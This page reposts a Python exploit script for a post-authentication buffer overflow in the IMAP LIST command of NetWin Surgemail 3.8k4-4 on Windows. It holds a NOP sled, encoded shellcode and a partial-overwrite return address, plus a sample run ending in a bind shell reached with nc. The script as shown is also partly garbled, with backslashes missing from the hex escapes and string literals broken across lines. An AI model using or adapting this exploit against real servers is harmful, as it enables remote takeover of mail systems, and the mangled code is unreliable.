Home / os / win10

netwin-list.txt

Posted on 16 March 2008

#!/usr/bin/python
###############################################################################
#
# NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Universal Exploit
# Discovered and coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : Version 3.8k4-4 Windows Platform
# Tested on OS      : Windows 2000 SP4 English
#                     Windows XP Sp2 English
#                     Windows 2003 Standard Edition Italian
# Discovery Date    : 03/13/2008
#
#-----------------------------------------------------------------------------
#
# Thx to muts _[at]_ offensive-security.com
# for the "Partial Overwrite" Suggestion  :)  Now I know it works!
#
#-----------------------------------------------------------------------------
##############################################################################
#
# matte@badrobot:~/surgemail$ ./surgemail_list.py -H 192.168.1.245 -P 143 -l \n# test -p test
#
# [*********************************************************************]
# [*                                                                   *]
# [*    NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Exploit     *]
# [*                      Discovered and Coded By                      *]
# [*                          Matteo Memelli                           *]
# [*                             (ryujin)                              *]
# [*              www.be4mind.com - www.gray-world.net                 *]
# [*                                                                   *]
# [*********************************************************************]
# [+] Connecting to imap server...
# * OK IMAP ryujin (Version 3.8k4-4)
#
# [+] Logging in...
# 0001 OK  LOGIN completed
#
# [+] PWNING IN PROGRESS  :)  ...
# [+] DONE! Check your shell on 192.168.1.245:4444
# matte@badrobot:~/surgemail$ nc 192.168.1.245 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# c:surgemail>ipconfig
# ipconfig
#
# Windows IP Configuration
#
#
# Ethernet adapter Local Area Connection:
#
#        Connection-specific DNS Suffix  . :
#        IP Address. . . . . . . . . . . . : 192.168.1.245
#        Subnet Mask . . . . . . . . . . . : 255.255.255.0
#        Default Gateway . . . . . . . . . : 192.168.1.197
#
# c:surgemail>
#
##############################################################################

from socket import *
from optparse import OptionParser
import sys, time

print "[*********************************************************************]"
print "[*                                                                   *]"
print "[*    NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Exploit     *]"
print "[*                      Discovered and Coded By                      *]"
print "[*                          Matteo Memelli                           *]"
print "[*                             (ryujin)                              *]"
print "[*              www.be4mind.com - www.gray-world.net                 *]"
print "[*                                                                   *]"
print "[*********************************************************************]"
usage =  "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
parser.add_option("-l", "--login-user", type="string",
action="store", dest="USER",
help="User login")
parser.add_option("-p", "--login-password", type="string",
action="store", dest="PASSWD",
help="User password")
(options, args) = parser.parse_args()
HOST    = options.HOST
PORT    = options.PORT
USER    = options.USER
PASSWD  = options.PASSWD
if not (HOST and PORT and USER and PASSWD):
parser.print_help()
sys.exit()

NOPES     = "x90"*9654
SJUMP     = "xEBxF9x90x90"     # Jmp Back
NJUMP     = "xE9xDDxD7xFFxFF" # And Back Again Baby  ;)
# Partial Overwrite: 0x00 not allowed in buffer and all poppopret
# begin with 0x00 in surgemail.exe
RET       = "x7ex51x78"
SHELLCODE = (
#[*] x86/alpha_mixed succeeded, final size 697
"x89xe0xd9xebxd9x70xf4x59x49x49x49x49x49x49x49"
"x49x49x49x49x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx43x5ax4ax4bx50x4dx4dx38x4bx49x4bx4fx4bx4f"
"x4bx4fx43x50x4cx4bx42x4cx47x54x46x44x4cx4bx50"
"x45x47x4cx4cx4bx43x4cx44x45x44x38x45x51x4ax4f"
"x4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x43x31x4a"
"x4bx50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31"
"x49x50x4cx59x4ex4cx4bx34x49x50x42x54x44x47x49"
"x51x48x4ax44x4dx43x31x49x52x4ax4bx4bx44x47x4b"
"x50x54x51x34x47x58x44x35x4ax45x4cx4bx51x4fx46"
"x44x45x51x4ax4bx45x36x4cx4bx44x4cx50x4bx4cx4b"
"x51x4fx45x4cx45x51x4ax4bx43x33x46x4cx4cx4bx4b"
"x39x42x4cx51x34x45x4cx43x51x48x43x46x51x49x4b"
"x43x54x4cx4bx51x53x50x30x4cx4bx51x50x44x4cx4c"
"x4bx44x30x45x4cx4ex4dx4cx4bx51x50x45x58x51x4e"
"x43x58x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4fx4e"
"x36x42x46x46x33x43x56x42x48x47x43x46x52x45x38"
"x44x37x44x33x46x52x51x4fx46x34x4bx4fx4ex30x45"
"x38x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx48x56"
"x51x4fx4dx59x4dx35x43x56x4bx31x4ax4dx45x58x45"
"x52x46x35x43x5ax44x42x4bx4fx4ex30x45x38x48x59"
"x45x59x4ax55x4ex4dx46x37x4bx4fx49x46x51x43x46"
"x33x50x53x51x43x51x43x50x43x50x53x47x33x46x33"
"x4bx4fx48x50x45x36x45x38x42x31x51x4cx43x56x51"
"x43x4dx59x4dx31x4ax35x45x38x4ex44x45x4ax42x50"
"x48x47x46x37x4bx4fx49x46x43x5ax42x30x46x31x46"
"x35x4bx4fx4ex30x43x58x49x34x4ex4dx46x4ex4bx59"
"x46x37x4bx4fx48x56x50x53x51x45x4bx4fx4ex30x43"
"x58x4bx55x50x49x4bx36x47x39x51x47x4bx4fx48x56"
"x46x30x50x54x46x34x46x35x4bx4fx4ex30x4dx43x45"
"x38x4ax47x42x59x48x46x44x39x50x57x4bx4fx4ex36"
"x50x55x4bx4fx4ex30x43x56x42x4ax42x44x45x36x45"
"x38x45x33x42x4dx4bx39x4dx35x43x5ax50x50x46x39"
"x51x39x48x4cx4cx49x4dx37x42x4ax51x54x4bx39x4d"
"x32x50x31x49x50x4ax53x4ex4ax4bx4ex47x32x46x4d"
"x4bx4ex47x32x46x4cx4dx43x4cx4dx43x4ax46x58x4e"
"x4bx4ex4bx4ex4bx45x38x42x52x4bx4ex48x33x42x36"
"x4bx4fx43x45x47x34x4bx4fx48x56x51x4bx50x57x51"
"x42x50x51x46x31x46x31x42x4ax43x31x46x31x50x51"
"x51x45x46x31x4bx4fx48x50x43x58x4ex4dx4ex39x43"
"x35x48x4ex50x53x4bx4fx4ex36x42x4ax4bx4fx4bx4f"
"x50x37x4bx4fx4ex30x4cx4bx51x47x4bx4cx4cx43x49"
"x54x45x34x4bx4fx49x46x51x42x4bx4fx48x50x45x38"
"x4ax4fx48x4ex4dx30x45x30x51x43x4bx4fx49x46x4b"
"x4fx4ex30x44x4ax41x41")

s = socket(AF_INET, SOCK_STREAM)
print " [+] Connecting to imap server..."
s.connect((HOST, PORT))
print s.recv(1024)
print " [+] Logging in..."
s.send("0001 LOGIN %s %s
" % (USER, PASSWD))
print s.recv(1024)
print " [+] PWNING IN PROGRESS  :)  ..."
EVIL = NOPES + SHELLCODE + NJUMP + SJUMP + RET
s.send('0002 LIST () "/' + EVIL + '" "PWNED"
')
print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444)
s.close()

 

TOP

Malware :

Exploits :